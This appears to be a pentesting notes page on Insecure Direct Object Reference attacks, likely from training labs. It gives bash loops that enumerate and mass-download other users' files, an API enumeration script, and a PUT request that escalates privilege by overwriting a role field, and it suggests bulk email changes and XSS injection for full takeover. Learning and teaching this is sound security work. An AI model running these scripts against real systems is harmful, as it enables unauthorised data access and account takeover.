Insecure Direct Object Reference (IDOR)

Methodology

Identifying Object References

Look for URLs, forms, or APIs that reference internal objects directly. Common patterns:

/my-account?id=wiener
/blogs?userId=773fea0b-d694-496b-974b-4ae2b8d8cc9c
/user?id=123
/profile?id=wiener
/account/456
/message?id=90210
/email?id=105
/ticket/view?ticketId=320
/download?file=invoice-002.pdf
/file?id=resume123.docx
/document/8756
/order?id=31415
/checkout?orderId=1234
/invoice?id=980
/admin/upgrade-user?id=2
/update-role?userId=773
/post?postId=89
/comment/delete?commentId=2048
/logs?user=admin
/audit?id=777

When References Are Encoded

If object references are hashed or encoded (e.g., base64, md5, URL encoding), understand the encoding method and reverse it.

Common encoded parameters:

uid
username
file
contract

Example:

GET /download.php?contract=MQ%3D%3D

Base64-decode: MQ== → 1

Mass Enumeration Example

for x in {1..10}; do
  curl -s -X POST 'http://HOST/documents.php' -d "uid=$x" | grep -oP "/documents/\\K\\w*\\.\\w*"
done

Download Exploitation Script

#!/bin/bash
url='http://HOST:PORT/download.php?contract='
for i in {1..30}; do
  value=$(echo -n $i | base64 -w0 | jq -sRr @uri)
  filename=$(curl -s -I "$url$value" | grep -oP 'filename=\\"\\K\\w+\\.\\w*')
  wget -q "$url$value" -O "$filename"
done

Exploiting Insecure APIs

Step 1: User Enumeration

for x in {1..30}; do
  curl -s -X GET "http://HOST/profile/api.php/profile/$x" | jq
done

Sample output:

{
  "uid": "10",
  "uuid": "bfd92386a1b48076792e68b596846499",
  "role": "staff_admin",
  "full_name": "admin",
  "email": "admin@employees.htb"
}

Step 2: Escalation via Insecure Function Calls (PUT)

PUT /profile/api.php/profile/1 HTTP/1.1
Host: 83.136.253.171:45444
Cookie: role=employee
Content-Type: application/json

{
  "uid": 1,
  "uuid": "40f5888b67c748df7efba008e7c2f9d2",
  "role": "staff_admin",
  "full_name": "Adrian Morales",
  "email": "Intrusionz3r0@employees.htb",
  "about": "<h1>Hola</h1>"
}

This allows privilege escalation by overwriting the role field.

Combining Leaks + Writes = Complete Takeover

First, enumerate user data (UUIDs, roles, etc.).
Then, modify those values via IDOR-vulnerable PUT endpoints.
You can:
- Change all users’ emails to one you control.
- Inject XSS in about fields.
- Change user roles in bulk.

PreviousCommand Injection NextXML External Entity (XXE) Injection

Last updated 2 months ago

/my-account?id=wiener /blogs?userId=773fea0b-d694-496b-974b-4ae2b8d8cc9c /user?id=123 /profile?id=wiener /account/456 /message?id=90210 /email?id=105 /ticket/view?ticketId=320 /download?file=invoice-002.pdf /file?id=resume123.docx /document/8756 /order?id=31415 /checkout?orderId=1234 /invoice?id=980 /admin/upgrade-user?id=2 /update-role?userId=773 /post?postId=89 /comment/delete?commentId=2048 /logs?user=admin /audit?id=777

#!/bin/bash url='http://HOST:PORT/download.php?contract=' for i in {1..30}; do value=$(echo -n $i | base64 -w0 | jq -sRr @uri) filename=$(curl -s -I "$url$value" | grep -oP 'filename=\\"\\K\\w+\\.\\w*') wget -q "$url$value" -O "$filename" done

PUT /profile/api.php/profile/1 HTTP/1.1 Host: 83.136.253.171:45444 Cookie: role=employee Content-Type: application/json { "uid": 1, "uuid": "40f5888b67c748df7efba008e7c2f9d2", "role": "staff_admin", "full_name": "Adrian Morales", "email": "Intrusionz3r0@employees.htb", "about": "<h1>Hola</h1>" }